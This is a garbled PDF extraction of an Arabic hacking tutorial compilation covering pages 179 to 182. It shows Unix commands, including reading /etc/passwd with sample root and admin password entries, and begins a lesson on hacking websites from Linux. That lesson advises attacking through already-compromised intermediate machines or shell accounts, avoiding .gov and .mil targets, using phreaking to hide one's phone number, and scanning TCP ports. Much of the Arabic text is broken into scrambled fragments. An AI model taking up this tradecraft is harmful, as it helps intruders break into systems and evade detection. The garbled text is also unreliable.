‫ﺛﻢ ﺳﯿﻄﻠﺐ ﻣﻨﻚﻛﻠﻤﺔ ﺎﻟﺴ ﺮ ﺎﻟﻘﺪﯾﻤﺔ ﻮﻫﻲ ﻃﺒﻌﺎ ﻣﻌﻚ !!ﻮﺗﺪ ﺧ ﻞﻛﻠﻤﺔ ﺎﻟﺴ ﺮ ﺎﻟﺠﺪﯾﺪة ‪..‬‬

‫ﺘﺎﻟﻲ ‪:.‬‬
‫ﺘﺐ ﺎﻷﻣ ﺮ ﺎﻟ‬‫ﻟﻠﺒ ﺤﺚ ﻋﻦ ﻣﻌﻠﻮﻣﺔ ﻣﻌﯿﻨﺔﺗﻜ‬
‫‪grep phone Black $‬‬
‫ﺘﺨﺪم ﺎﻵ ﺧ ﺮ‬
‫ﻗﺎم ﺎﻟﻬﺎﺗ ﻒ ﺎﻟﺨﺎ ﺻﺔﺑﺎﻟﻤﺴ‬
‫ﺘ ﺮا ض ﺎﻧﻚ ﻃﻠﺒ ﺖ ﺎر‬
‫ﻮﻫﺬاﺑﺎﻓ‬

‫ﺘﺐ ﺎﻵﺗﻲ ‪:.‬‬


‫ﻮﻟﻌﻤ ﻞ ﻧﺴ ﺦ ﻣﻦ ﻣﻠ ﻒ ﺎﻟﻰ ﻣﻠ ﻒﺂ ﺧ ﺮﺗﻜ‬
‫‪cp letter letters $‬‬

‫‪١ ٧٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺎﻟﻲ ‪:.‬‬
‫ﺘﺐ ﺎﻷﻣ ﺮ ﺎﻟ‬
‫ﺘﻜ‬‫ﺘﺨﺪمﺂ ﺧ ﺮ ﻋﻠﻰ ﺎﺗﺼﺎ لﻓ‬
‫ﺛﺔ ﻣﻊ ﻣﺴ‬
‫ﺎذا ﺎرد ت ﻋﻤ ﻞ ﻣ ﺤﺎد‬
‫‪write $‬‬

‫ﺘﺐ ﺎﻵﺗﻲ ‪:.‬‬


‫ﻮﻟﻤﻌ ﺮﻓﺔ ﻣﻦ ﯾﻮﺟﺪ ﻋﻠﻰ ﺎﻟﻨﻈﺎم ﻧﻜ‬
‫‪who $‬‬

‫‪safadM tty1 april 19 2:30‬‬


‫‪paul tty2 april 19 2:19‬‬
‫‪gopher tty3 april 19 2:31‬‬

‫ﺘﺨﺪام‬
‫ﺘﻮي ﻋﻠﻰﻛﻠﻤﺎ ت ﺎﻟﺴ ﺮ ﺎﻟﻤﻈﻠﻠﺔ ﯾﺠﺐ ﺎنﺗﻜﻮنﻗﺪ ﺪ ﺧﻠ ﺖ ﻋﻠﻰ ﺎﻟﻨﻈﺎمﺑﺎﺳ‬ ‫ﻮاذا ﺎرد تﻗ ﺮا ءة ﺎﻟﻤﻠ ﻒ ﺎﻟﻤ ﺤ‬
‫ﺘﺐ ‪:.‬‬ ‫ﺘﻌ ﺮا ض ﻣﻠ ﻒﻛﻠﻤﺎ ت ﺎﻟﺴ ﺮ ﻧﻜ‬‫ﺣﺴﺎب ﺎﻟﻤﺪﯾ ﺮ ﻧﻔﺴﻪ ‪ ..‬ﻮﻻﺳ‬
‫‪cat /etc/passwd $‬‬
‫‪root:F943/sys34:0:1:0000:/:‬‬
‫‪sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh‬‬
‫‪checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh‬‬

‫ﺘﺎﻟﻲ ‪:.‬‬
‫ﻗﺪ ﯾﻈﻬ ﺮ ﺣﺴﺎبﺂ ﺧ ﺮﻟﻠﻤﺪﯾ ﺮﻛﺎﻟ‬
‫ﻮ‬
‫‪Black:chips11,43:34:3:Mr doooom:/usr/Black:‬‬

‫ﺛﺔ ﺎﺳﺎﺑﯿﻊﺑﺪونﺗﻐﯿﯿ ﺮ ﻮاﻧﻪ ﯾﺠﺐ ﺎن ﯾﻐﯿ ﺮﻫﺎﻛ ﻞ‬


‫ﺘﻔﺎظﺑﻜﻠﻤﺔ ﺎﻟﺴ ﺮﻟﻤﺪةﺛﻼ‬‫ﺘﺨﺪم ﺎﻻ ﺣ‬‫ﻮﻫﺬا ﯾﻌﻨﻲ ﺎﻧﻪ ﯾﻤﻜﻦﻟﻠﻤﺴ‬
‫ﺘﺔ ﺎﺳﺎﺑﯿﻊ ‪..‬‬‫ﺳ‬
‫ﺘﺎﻟﻲ ‪:.‬‬‫ﺘﻌ ﺮا ض ﻣﻠ ﻒ ﺎﻟﻤﺠﻤﻮﻋﺔﻛﺎﻟ‬‫ﺎﺳ‬
‫‪ls /etc/group $‬‬

‫‪root::0:root‬‬
‫‪adm::2:adm,root‬‬
‫‪bluebox::70:‬‬

‫ﺘﻮي !!‬ ‫ﺘﻮي ﻣﻠ ﻒ ﺎﻟﻤﺠﻤﻮﻋﺔ ﻋﻠﻰﻛﻠﻤﺎ ت ﺳ ﺮﺄو ﻻﯾ ﺤ‬ ‫وﯾﻤﻜﻦ ﺎن ﯾ ﺤ‬


‫ﺘﺨﺪم‬
‫ﺘﻮي ﻋﻠﻰﻛﻠﻤﺔ ﺳ ﺮﻓﺎﻧﻪ ﯾﻤﻜﻦ ﺎنﺗﺼﺒﺢ ﺎﻧ ﺖ ﻣﺪﯾ ﺮاﻟﻠﻨﻈﺎمﻓﻲ ﺣﺎﻟﺔ ﺪ ﺧﻮﻟﻚﺑﻜﻠﻤﺔ ﺳ ﺮﻟﻤﺴ‬ ‫ﺎذاﻛﺎن ﻻﯾ ﺤ‬
‫ﻋﺎدي ﻮﻟﯿ ﺲﻛﻤﺪﯾ ﺮﻟﻠﻨﻈﺎم ﻮذﻟﻚﺑﻌﺪة ﻃ ﺮ ق …‪.‬‬

‫‪١ ٨٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﺷﺮح ﻣﻔﺼﻞ ﻣﻦ اﻷﻟﻒ إﱃ اﻟﯿﺎء ﰲ اﺣﱰاف اﺧﱰاق اﳌﻮاﻗﻊ ﻋﻦ‬


‫ﻃﺮﯾﻖ ﻟﯿﻨﻜﺲ "‬

‫‪$$$$$$$$$$$$‬‬
‫ـﺮ‬
‫ـ‬‫ـ‬
‫ـ‬‫ـﺴ‬
‫ـ‬
‫ـ‬‫ـ‬
‫ـ‬‫اﻟﻜﺎﺗﺐ‪:‬أﯾ‬
‫‪$$$$$$$$$$$$‬‬

‫‪UNix Usage IN HackinG‬‬


‫ﺎﻫﻼﺑﻜﻢ ﺟﻤﯿﻌﺎ‬
‫ﻓﻲاﻟﺒﺪاﯾﻪا ﺣﺐاناﻧﻮهانﻫﻨﺎكاﻟﻌﺪﯾﺪ ﻣﻦاﻟﺪروساﻟﺠﻤﯿﻠﻪﻓﻌﻼ ‪ ..‬وﻟﻜﻨﻬﺎﻗﺪﯾﻤﻪ وﻟﯿﺴ ﺖ ‪up to date‬‬
‫ﺘﻔﯿﺪوا ﻣﻨﻪ‬‫ﺘﺪﺋﯿﻦ ﯾﻤﻜﻦان ﯾﺴ‬ ‫ﺘﺐﻟﻜﻢ ﻫﺬااﻟﺪرساﻟﻤﻄﻮ لﻟﻜﻲ ﯾﻜﻮن ﻣﻜﺎﻧﺎﻟﻠﻤﺒ‬ ‫ﻟﺬﻟﻚاﻛ‬
‫واﺗﻤﻨﻰﻓﻌﻼان ﯾ ﺤﻮز ﻋﻠﻰاﻋﺠﺎﺑﻜﻢ ‪(:‬‬
‫‪-‬ﺑﻌ ﺾاﻟﻤﺼﻄﻠ ﺤﺎ تاﻟﻬﺎﻣﻪ ‪:‬‬
‫ﻛﺜﯿ ﺮ ﻣﻦاﻟﻨﺎس ﯾ ﺤﺒﻮنان ﯾﻄﻠﻘﻮا ﻋﻠﻰﻛ ﻞ ﻣﻦا ل ‪ pc , servers , supercomputers‬و ﻏﯿ ﺮﻫﺎ‬
‫ﻛﻠﻤﻪ ‪BOX‬‬
‫ﺘﻮي ﻋﺎده ﻋﻠﻰاﻟﻌﺪﯾﺪ ﻣﻦاﻟﯿﻮزرز ‪..‬ﺑﺎﻻ ﺿﺎﻓﻪﻟﻠﯿﻮزرز‬ ‫ﻗﻪ ﯾ ﺤ‬
‫ﺘ ﺮا‬
‫اﻟﻨﻈﺎماﻟﺬي ﺳﻮ ف ﻧﻘﻮمﺑﺎ ﺧ‬
‫ﺗﺴﻄﯿﻊانﺗﻄﻠ ﻖ ﻋﻠﻰاﻟ ﺮﺋﯿ ﺲﻫﻨﺎكﻛﻠﻤﻪ ‪ ... root‬و ﻫﻮ ﯾﻜﻮن‪، superuser‬‬
‫و ﻫﻮاﻻدﻣﯿﻦاواﻟﻤﺪﯾ ﺮ ﻋﻠﻰاﻟﻨﻈﺎم‪....‬‬
‫ﺘﺸﻐﯿ ﻞ ‪:‬‬‫ﺑﺎﻟﻨﺴﺒﻪ ﻻﻧﻈﻤﻪاﻟ‬
‫ﺘ ﻖ ﻣﻦ ﻧﻈﺎم‬ ‫ﺘﺎجاﻟﻰاي ﻧﻈﺎم ﻣﺸ‬ ‫ﺘﺸﻐﯿ ﻞ ‪.. windows‬ﺑ ﻞﺗ ﺤ‬ ‫ﺘﺨﺪام ﻧﻈﺎماﻟ‬ ‫ﺘ ﺮ قﺑﺎﺳ‬‫ﻃﺒﻌﺎ ‪..‬ﻻ ﯾﻤﻜﻨﻚانﺗﺨ‬
‫ﺘﺸﻐﯿ ﻞاﻟﯿﻮﻧﯿﻜ ﺲ ‪..‬‬‫اﻟ‬
‫ﺣﺴﻨﺎ ‪..‬اﻟﺴﺆا لﻫﻮﻟﻤﺎذا ﻫﺬهاﻻﻧﻈﻤﻪﺑﺎﻟﺬا ت ‪ ...‬وﻟﻤﺎذا ﻻ ﯾﺼﻠﺢاﻟﻮﯾﻨﺪوز؟؟‬
‫ﻟﺴﺒﯿﺒﻦ ‪:‬‬
‫ﻗﻲ ﺟﻬﺎز ﺷﻐﺎ ل ﻋﻠﻰاﻟﻮﯾﻨﺪوز ‪nt‬‬ ‫ﺘﻤﺰ ‪...‬و ﻧﺎدرﻟﻤﺎﺗﻼ‬‫ﺘ ﺮﻧ ﺖاﻏﻠﺒﻪ اﺟﻬﺰه ﺷﻐﺎﻟﻪ ﻋﻠﻰاﻟﯿﻮﻧﯿﻜ ﺲ ﺳﯿﺴ‬ ‫‪-١‬اﻻﻧ‬
‫‪. 9x‬‬
‫ﺘﺸﻐﯿ ﻞﻫﺬا‪..‬‬ ‫ﺘ ﺮ ق ﺟﻬﺎزاو ﺳﯿ ﺮﻓﯿ ﺮ ﺷﻐﺎ ل ﻋﻠﻰاﻟﯿﻮﻧﯿﻜ ﺲ ‪..‬ﯾﺠﺐانﺗﻜﻮن ﻣﻠﻤﺎﺑﻨﻈﺎماﻟ‬ ‫ﺘﻰﺗﺨ‬ ‫ﻗ ﻞ ﺣﺎﺟﻪ ﺣ‬ ‫اذنا‬
‫ﻟﺬا ﻣﻦاﻻﻓ ﻀ ﻞاﻧﻚﺗ ﺮﻛﺒﻪﻓﻲ ﺟﻬﺎزك ‪..‬‬
‫ﺘﺎ ت ﻣﺼﻤﻤﻪﻟﻠﻌﻤ ﻞﻓﻲﺑﯿﺌﻪاﻟﯿﻮﻧﯿﻜ ﺲ ‪..‬‬ ‫‪ -٢‬ﻃﺒﻌﺎ ‪ ..‬ﻣﻌﻈﻢاادوا ت واﻛﻮاداﻻﻛﺴﺒﻠﻮﯾ‬

‫اوﻛﻲ ‪ ...‬ﻣﺎ ﻫﻲﺗﻮزﯾﻌﺎ تاﻟﯿﻮﻧﯿﻜ ﺲ ؟؟واﻟﻠﯿﻨﻜ ﺲ ؟؟‬


‫ﺑﺎﻟﻨﺴﺒﻪﻟﻠﯿﻮﻧﯿﻜ ﺲ ‪..‬ﻓﻬﻮ ﻣﻨﻘﺴﻢاﻟﻲﻗﺴﻤﯿﻦ ‪:‬‬
‫‪ -١‬ﯾﻮﻧﯿﻜ ﺲﺗﺠﺎري ‪ ).‬ﻏﯿ ﺮ ﻣﺠﺎﻧﻲ (‬
‫ﺘﻮ حاﻟﻤﺼﺪر و ﻣﺠﺎﻧﻲ ‪open source‬‬ ‫‪ -٢‬ﯾﻮﻧﯿﻜ ﺲ ﻣﻔ‬

‫ﺘﺠﺎري ﻻ ﯾﻤﻜﻦانﺗ ﺮﻛﺒﻪ ﻋﻠﻰ ﺟﻬﺎزكاﻟﻌﺎدي ‪..‬ﻟﺬاﻓﯿﻤﻜﻨﻚﺗﺠﺎﻫﻠﻪاﻻن ‪(:‬‬ ‫ﺑﺎﻟﻨﺴﺒﻪﻟﻠﯿﻮﻧﯿﻜ ﺲاﻟ‬


‫اﻣﺎاﻟﻤﺠﺎﻧﻲﻓﯿﻮﺟﺪ ﻣﻨﻪ ﻋﺪه ﻋﺎﺋﻼ ت‬
‫‪BSD-‬‬
‫ﺘﻌﻤﻠﻬﺎاﻻاذاﻛﻨ ﺖﺗ ﺮﻏ ﺐﻓﻲﺗ ﺮﻛﯿﺐ ﺳﯿ ﺮﻓﯿ ﺮ‬‫ﺘﻌﻤﺎ ل ‪ ..‬و ﻣﻦاﻻﻓ ﻀ ﻞﻟﻚاﻻﺗﺴ‬‫ﻗﺪم واﻻ ﺻﻌﺐﻓﻲاﻻﺳ‬ ‫وﻫﻲاﻻ‬
‫ﻋﻠﻰاﻟﺠﻬﺎز‬
‫‪...‬‬
‫ﺘﻌ ﺮﯾ ﻒ‬‫ﯾﻮﺟﺪاﻟﻠﯿﻨﻜ ﺲ ‪..‬وﻫﻮ ﻃﺒﻌﺎ ﻏﻨﻲ ﻋﻦاﻟ‬

‫‪١ ٨١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻮزﯾﻌﺎ ت وانﻛﺎناﻓ ﻀﻠﻬﺎ ﻫﻲ ‪) SuSe‬ﻟﻢاﺟ ﺮﺑﻬﺎ وﻟﻜﻦاﺳﻤﻊاﻟﻜﺜﯿ ﺮ ﻣﻦ‬ ‫ﻃﺒﻌﺎ ‪ ..‬ﯾﻮﺟﺪ ﻣﻨﻪاﻟﻌﺪﯾﺪ ﻣﻦاﻟ‬
‫ﺘﻮزﯾﻌﻪ (‬ ‫اﻟﻨﺎس ﯾﺸﻜ ﺮونﻓﻲ ﻫﺬهاﻟ‬
‫اﻣﺎﺑﺎﻟﻨﺴﺒﻪ ﻻﺳﻬ ﻞﺗﻮزﯾﻪﻓﻬﻲ ‪ MDK‬وﻗﺪ و ﺿﻌ ﺖ ﻫﻨﺎﺑﻌ ﺾاﻟﺪروساﻟﺨﺎﺻﻪﺑﺎﻟﻤﻨﺪرﯾﻚ‬
‫ﺘﻬﺎ ‪..‬‬‫ﯾﻤﻜﻨﻚﺗ ﺤﻤﯿﻠﻬﺎ وﻗ ﺮاﺋ‬
‫ﺘﻲ ﻋﻠﻰاﯾﻤﯿﻠﻲ و ﻧ ﺤﺪد ﻣﻜﺎﻧﺎ‬
‫انﻟﻢﺗﺠﺪ ﻣﻜﺎﻧﺎﺗ ﺤﺼ ﻞ ﻣﻨﻪ ﻋﻠﻰاﻟﻠﯿﻨﻜ ﺲ ﯾﻤﻜﻨﻚ ﻣ ﺮاﺳﻠ‬
‫ﺘﺴﻠﯿﻤﻚ ﻧﺴﺨﻪ ﻣﻦاﻟﻤﺎﻧﺪرﯾﻚ‪٩‬اواﻟ ﺮﯾﺪ ﻫﺎ ت‪) ٧٫٢‬ﺛﻤﻦاﻻﺳﻄﻮاﻧﺎ تاﻟﺒﻼﻧﻚ واﻟﻨﺴ ﺦﻓﻘﻂ (‬ ‫ﻟ‬
‫ﺘﻘ ﺮ ‪ ..‬ﻣﺠﺎﻧﻲ ‪ ..‬ﯾﻤﻜﻨﻚﺗﻄﻮﯾ ﺮهﻟﯿﻼﺋﻢاﻣﻜﺎﻧﯿﺎ ت ﺟﻬﺎزك‬
‫ﻋﻠﻰاي ﺣﺎ ل ‪..‬ﻟﻠﯿﻨﻜ ﺲ ﻣﻤﯿﺰا تﻛﺜﯿ ﺮه ‪..‬اﻣﻦ ‪ ...‬ﻣﺴ‬
‫‪..‬‬

‫ﺘ ﺮﻧ ﺖ‬‫‪-‬اﻻﻧ‬
‫ﺘ ﺮ ق ﺟﻬﺎزكام ﻣﺎذا ؟؟‬‫ﺘ ﺮ ق ‪..‬ﺟﻤﯿ ﻞ ﺟﻤﯿ ﻞ ‪..‬ﺗ ﺮﯾﺪانﺗﺨ‬
‫‪ ..‬ﻣﺎذا ‪...‬ﺗ ﺮﯾﺪانﺗﺨ‬
‫ﺘ ﺮﻧ ﺖ ‪(:‬‬
‫ﺘ ﺮﻧ ﺖ ‪...‬اذن ‪..‬دﻋﻨﺎ ﻧﺒ ﺤ ﺮ ﻋﻠﻰاﻻﻧ‬
‫ﺘ ﺮ قاﺟﻬﺰه ﻣﺒ ﺤ ﺮهﻓﻲاﻻﻧ‬
‫اه‪..‬ﺗ ﺮﯾﺪانﺗﺨ‬

‫ﺘ ﺮﻧ ﺖ ‪..‬ﻟﻜﻦﻫﺬاﻛﺎن ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﻮﯾﻨﺪوز‬ ‫اﻧﺎ ﻋﺎر فاﻧﻚ ﺣﺼﻠ ﺖ ﻋﻠﻰاﻟﺪرس ده ﻣﻦاﻻﻧ‬


‫ﺘ ﺮﻣﻪ ‪..‬‬ ‫ﺘﻠ ﻒ‪...‬اﻧ ﺖاﻧﺴﺎنﻟﯿﻨﻜﺴﻲ ‪ ..‬ذهﻓﻠﺴﻔﻪ ﻣ ﺤ‬ ‫‪..‬ﻟﻜﻦاﻧ ﺖاﻟﯿﻮماﻧﺴﺎن ﻣﺨ‬
‫ﺘﺎﻋﻚ ﻋﻠﻰاﻟﻠﯿﻨﻜ ﺲ‬ ‫ﺘ ﺮﻧ ﺖ ﻣﻦ ﻧﻈﺎماﻟﯿﻮﻧﯿﻜ ﺲ ‪..‬ﻟﻦاﺳﺎﺳﺎ ﯾﺠﺐانﺗﻌ ﺮ فاﻟﻤﻮدمﺑ‬ ‫اذن ﯾﺠﺐانﺗﺒ ﺤ ﺮاﻟﻰاﻻﻧ‬
‫ﻗﻲاناﻟﻠﯿﻨﻜ ﺲﻟﻢ ﯾﺠﺪاي ﻣﻮدم ﻣﻮ ﺻ ﻞﺑﺎﻟﺠﻬﺎز ؟؟‬ ‫ﺘﻼ‬ ‫ﺘﻮزﯾﻌﻪاﻟﻠﻲ ﻋﻨﺪك ‪ ..‬ﺣﺎو لﺗﻌ ﺮ فاﻟﻤﻮدم ‪ ..‬ﺣ‬ ‫ﺣﺴﺐاﻟ‬
‫ﺘﻌﺠﺐ ‪..‬‬ ‫ﻣﺎ ﻫﺬا ‪..‬ﻻﺗ‬
‫ﻓﻜ ﻞاﻟﻤﻮدﻣﺎ تاﻟﺪا ﺧﻠﯿﻪ ‪ internal‬ﯾﻄﻠﻘﻮن ﻋﻠﯿﻬﺎ ‪.. winmodems‬‬
‫ﺘﺸﻐﯿ ﻞ ‪.. windows‬ارﺟﻮك ﻻﺗﻠﻮماﻟﻠﯿﻨﻜ ﺲ ‪..‬‬ ‫ﻟﻤﺎذا ﻻﻧﻬﺎ ﻣﺼﻤﻤﻪاﺳﺎﺳﺎﻟﻠﻌﻤ ﻞﺗ ﺤ ﺖ ﻧﻈﺎماﻟ‬
‫ﺑ ﻞ ﯾﺠﺐانﺗﻠﻮم ﺻﺎﻧﻊﻛ ﺮو تاﻟﻔﺎﻛ ﺲاﻟﺪا ﺧﻠﯿﻪ ﻫﺬه ‪(:‬‬
‫اوﻛﻲ ‪..‬اﻣﺎﺑﺎﻟﻨﺴﺒﻪﻟﻠﻤﻮدماﻟﺨﺎرﺟﻲ ‪external‬ﻓﻬﻮ ﻣﻮدم ﺣﻘﯿﻘﻲ ‪real or true modems‬‬
‫‪ ...‬ﯾﻮﺟﺪاﻟﻌﺪﯾﺪ ﻣﻦاﻟﻤﻮدﻣﺰاﻟﺨﺎرﺟﯿﻪ ﻣﺜ ﻞ ‪acorp , u.s. robotics‬‬
‫ﺘﺎﻛﺪاناﻟﻤﻮدم ﯾﻜﻮن ‪ serial‬وﻟﯿ ﺲ ‪USB‬‬ ‫ﯾﺠﺐانﺗ‬
‫ﻋﻠﻰاي ﺣﺎ ل ﺧﻠﯿﻨﺎﻓﻲ ﻣﻮ ﺿﻮﻋﻨﺎ‪...‬‬
‫ﺘ ﺮﻧ ﺖ ﻣﻦ ﺧﻼ لا ل ‪ isp‬وذﻟﻚ ﻣﻦ ﺧﻼ ل ﻧﻈﺎماﻟﻠﯿﻮﻧﯿﻜ ﺲ ‪(:‬‬ ‫ﺧﻼ ص ‪..‬اد ﺧ ﻞ ﻋﻠﻰاﻻﻧ‬

‫ﺘ ﺮا ق ﺳﯿ ﺮﯾﻔﯿ ﺮ‬
‫ﺘﻚ ﻻ ﺧ‬ ‫ﺘﻢاﻻﯾﻘﺎ عﺑﻚ وﻛﺸ ﻒ ﻣ ﺤﺎوﻟ‬ ‫ﺘ ﺮا قﻫﻲانﺗ ﺤﺎو لاﻻ ﯾ‬ ‫اﻫﻢ ﺣﺎﺟﻪﻗﺒ ﻞاﻟﺸ ﺮو عﻓﻲاﻻ ﺧ‬
‫ﻣﻌﯿﻦ ‪..‬‬
‫ﺘﻤﯿﺰهﻓﻲ ﻣﺠﺎ لاﻟ ﺤﻤﺎﯾﻪ‬ ‫و ﻃﺒﻌﺎ ﻫﻨﻚ و ﺳﺎﺋ ﻞ ﻋﺪﯾﺪهﻟﺬﻟﻚﻟﻦاﺗﻄ ﺮ قاﻟﯿﻬﺎ ﻻن ﻫﻨﺎكاﻟﻌﺪﯾﺪ ﻣﻦاﻟﺸ ﺮو حاﻟﻤ‬
‫ﺛﺮ‬
‫وازاﻟﻪاﻻ‬
‫ﺛﻪ ‪:‬‬
‫ﺘﯿﻦاوﺛﻼ‬ ‫اﻟﺨﺼﻬﻢﻓﻲ ﻧﻘﻄ‬
‫ﺘﻰﺑﺎﺳﺎﻣﻲ ﻣﺰوره ﻻن ﻫﺬاﻗﺪ ﯾﺠﻌﻠﻚ ﻋ ﺮ ﺿﻪ‬ ‫ﻗﻪ ‪ ..‬و ﻻ ﺣ‬‫ﺘ ﺮا‬
‫ﻗﻊﺗ ﺤﺎو لا ﺧ‬‫‪-١‬اﯾﻚانﺗ ﺤﺎو لانﺗﺴﺠ ﻞﻓﻲ ﻣﻮ‬
‫ﻟﻜﺸ ﻒاﻻيﺑﻲاﻟﺨﺎ صﺑﻚ‬
‫ﻗﻢ ﻫﺎﺗﻔﻚ و ﺻﺒﺎ حاﻟﻔ ﻞ ‪ ...‬ت‬ ‫و ﻣﻦﺛﻢا ل ‪isp‬ﺛﻢ ر‬
‫ﺘﻤﯿﻦﺑﺎﻣﻮراﻟﻬﺎك ‪...‬‬ ‫ﻗﺎﺗﻚاﺑﺪااﻣﺎ ﻏﯿ ﺮاﻟﻤﻬ‬ ‫ﺘ ﺮا‬
‫ﺘﺒﺎﻫﻰﺑﺎ ﺧ‬‫‪-٢‬اﯾﺎكانﺗ‬
‫ﺘﻨﻲ ﻏﻠﻂ ‪ ..‬ﻣ ﺶﻗﺼﺪي ﯾﻌﻨﻲﺗ ﺮو حﻟﻨ ﺖﻛﺎﻓﯿﻪ‬ ‫ﺘ ﺮ ق داﺋﻢ ﻣﻦ ﺧﻼ ل ﺟﻬﺎزك ‪ ...‬ﻻ ﻻ ‪..‬اﻧ ﺖﻓﻬﻤ‬ ‫‪-٣‬ا ﺣﺎو لاﻻﺗﺨ‬
‫‪(:‬‬
‫ﺟﻬﺎزك =====<اﻟﺠﻬﺎزاﻟ ﻀ ﺤﯿﻪ ‪ ...‬ده ﻣ ﺶ ﻣﺎﻣﻮن ‪..‬ﻟﻜﻦ‬
‫ﺟﻬﺎزك======< ﺟﻬﺎز وﺳﯿﻂ======< اﻟﺴﯿ ﺮﻓﯿ ﺮاﻟ ﻀ ﺤﯿﻪ ‪...‬دهﻛﺪهﻛﻮﯾ ﺲاوي‬
‫ﺘ ﺮ ق ﻣﻦﻗﺒ ﻞاو ﺷﯿ ﻞاﻛﺎوﻧ ﺖ ‪.‬‬ ‫ﻃﯿﺐاﯾﻪاﻟﺠﻬﺎزاﻟﻮﺳﯿﻂ ده‪ ..‬ده ﻣﻤﻜﻦ ﯾﻜﻮن ﻣﺜﻼ ﺟﻬﺎز ﻣﺨ‬

‫‪١ ٨٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘ ﺤﻜﻢﻓﻲ ﺟﻬﺎز ﻣﻦﺑﻌﯿﺪ و ﻫﺬا‬ ‫ﻃﯿﺐ ﻣﺎﻫﻮاﻟﺸﯿ ﻞاﻛﺎوﻧ ﺖ‪:‬ﻫﻮ ﻋﺒﺎره ﻋﻦ ﺧﺪﻣﻪ ﺣﯿﺚ ﯾﻤﻜﻨﻚ ﻣﻦ ﺧﻼﻟﻬﺎاﻟ‬
‫اﻟﺠﻬﺎز ﻋﻠﯿﻪ ﻧﻈﺎماﻟﯿﻮﻧﯿﻜ ﺲ‬
‫ﺘ ﺮا قﻫﺬااﻟﺠﻬﺎز ‪..‬و ﯾﻮﺟﺪاﻟﻌﺪﯾﺪ ﻣﻤﻦ ﯾﻘﺪﻣﻮن ﻫﺬااﻟ ﺤﺪﻣﻪ ﻣﺠﺎﻧﺎ ‪..‬‬ ‫ﻃﺒﻌﺎ ﻣﻦ ﻏﯿ ﺮانﺗﻘﻮمﺑﺎ ﺧ‬
‫ﺘ ﺮ قاﺟﻬﺰه ﺧﻄﯿ ﺮه و ﻣﻬﻤﻪ ﻣﺜ ﻞ ‪gov .mil.‬او ﺳﯿ ﺮﻓﯿ ﺮا تاﺟﺐ ﻋﻠﯿﻚﻗﺒ ﻞان ‪ edu.‬و‬ ‫‪ -٤‬ﺣﺎو لان ﻻﺗﺨ‬
‫ﻏﯿ ﺮﻫﺎ ﻣﻦ ﻫﺬااﻟﻨﻤﻂ‪.‬‬
‫ﻗﻢﺗﻠﯿﻔﻮﻧﻚ ﻋﻦ ﻣﺰوداﻟﺨﺪﻣﻪﻟﺪﯾﻚ ‪.‬‬ ‫ﺘﻤﺪ ﻋﻠﻰﺑﻌ ﺾﺗﻘﻨﯿﺎ تاﻟﻔ ﺮﯾﻜﯿﻨ ﺞ ‪..‬ﻟﻌﻤ ﻞا ﺧﻔﺎ ءﻟ ﺮ‬ ‫‪-٥‬ﻫﺬهاﻟﻨﻘﻄﻪﺗﻌ‬
‫‪REdirecting‬‬

‫ﻗﻊ وﻣﻨﺎﻓﺬ ا ل ‪: TCP‬‬


‫‪-‬ﻓ ﺤ ﺺاﻟﻤﻮا‬

‫ﺘﻤﺪ ﻋﻠﻰﺑ ﺮوﺗﻮﻛﻮ ل ﯾﺪﻋﻰ‬‫ﺘ ﺮﻧ ﺖ ‪..‬اﻧﻪ ﯾﻌ‬


‫ﺘ ﺮا قانﺗﻌ ﺮ فﻛﯿ ﻒ ﯾﻤﺸﻲاﻻﻧ‬ ‫ﯾﺠﺐ ﻋﻠﯿﻚﻗﺒ ﻞانﺗﻘﻮمﺑﺎﻻ ﺧ‬
‫‪TCP\IP‬‬
‫وﺑﻌ ﺾاﻟﺒ ﺮوﺗﻮﻛﻮﻻ تاﻻ ﺧ ﺮى ‪....‬‬
‫ﻃﯿﺐ ‪ ...‬رﻛﺰ ﻣﻌﺎﯾﺎاﺑﻮساﯾﺪك =‪D‬‬
‫ﺘﻮ ﺣﻪ ‪..‬ﻫﺬااﻟﺒﻮرﺗﺎ ت ﯾﻤﻜﻨﻚانﺗﻘﻮم ﻣﻦ ﺧﻼﻟﻬﺎ‬ ‫اﻟﻤﻔ ﺮو ضانﻛ ﻞ ﺟﻬﺎز ﻋﻠﻰاﻟﻨ ﺖﺑﯿﻜﻮنﻓﯿﻪﺑﻮرﺗﺎ ت ﻣﻔ‬
‫ﺑﺎرﺳﺎ لاﻟﺪاﺗﺎ‬
‫ﺘﻠﻘﻲاﻟﺪاﺗﺎ‬‫ﺘﻌﺪد داﺋﻤﺎﻟ‬‫ﺘﻮ ﺣﻪﻓﻘﻂ (ﺗﻜﻮن ﻋﻠﻰاﺳ‬ ‫ﺘﻮ ﺣﻪ )اﻟﻤﻔ‬‫ﻣﻦ ﺟﻬﺎزاﻟﻰ ذﻟﻚاﻟﺠﻬﺎز ‪..‬ﻫﺬهاﻟﺒﻮرﺗﺎ تاﻟﻤﻔ‬
‫ﻣﻦ رﯾﻤﻮ تﺑﻮﻛ ﺲ‬
‫ﺘﻮ ﺣﻪﺑﻤﺎ ﯾﺴﻤﻰﺑﺨﺪﻣﻪ ‪<< service..‬‬ ‫داﺋﻤﺎ ﻣﺎﺗﺮﺗﺒﻂاﻟﺒﻮرﺗﺎ تاﻟﻤﻔ‬
‫ﺘ ﻀﺎﻓﻪ ﻣﻦ ﺧﻼ ل دﯾﻤﻮن ‪daemon or server‬‬ ‫و ﻫﺬااﻟﺨﺪﻣﻪ ‪ service‬ﺗﻜﻮن ﻣﺴ‬
‫ﺘﺢ ﻣﻨﻔﺬﻓﻲاﻟﺴﯿ ﺮﻓﯿ ﺮ ‪..‬ﻟﻜﻲ ﯾﻘﻮم‬
